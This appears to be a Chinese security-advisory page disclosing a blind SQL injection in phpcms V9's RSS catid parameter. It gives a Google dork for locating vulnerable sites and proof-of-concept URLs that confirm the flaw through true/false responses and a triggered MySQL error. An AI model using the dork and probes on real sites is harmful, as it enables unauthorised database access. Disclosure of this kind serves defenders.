phpcms V9 BLind SQL 注入漏洞0day
摘要:影响版本:phpcmsv9blind官方网站:http://www.phpcms.cn漏洞类型:SQL注入漏洞描述:phpcmsv9blin...
影响版本:phpcms v9 blind
官方网站:http://www.phpcms.cn
漏洞类型:SQL注入
漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。
google dork:inurl:"index.php?m=content+c=rss+catid=10"
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
【phpcms V9 BLind SQL 注入漏洞0day】相关文章:
★ Toshiba Surveillix ActiveX 控件远程栈溢出漏洞
★ Cisco Unified IP Phone SCCP及SIP 协议安全漏洞
★ Coppermine Photo Gallery跨站脚本及SQL注入漏洞
★ PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞
★ MirOS BSD Korn Shell本地权限提升漏洞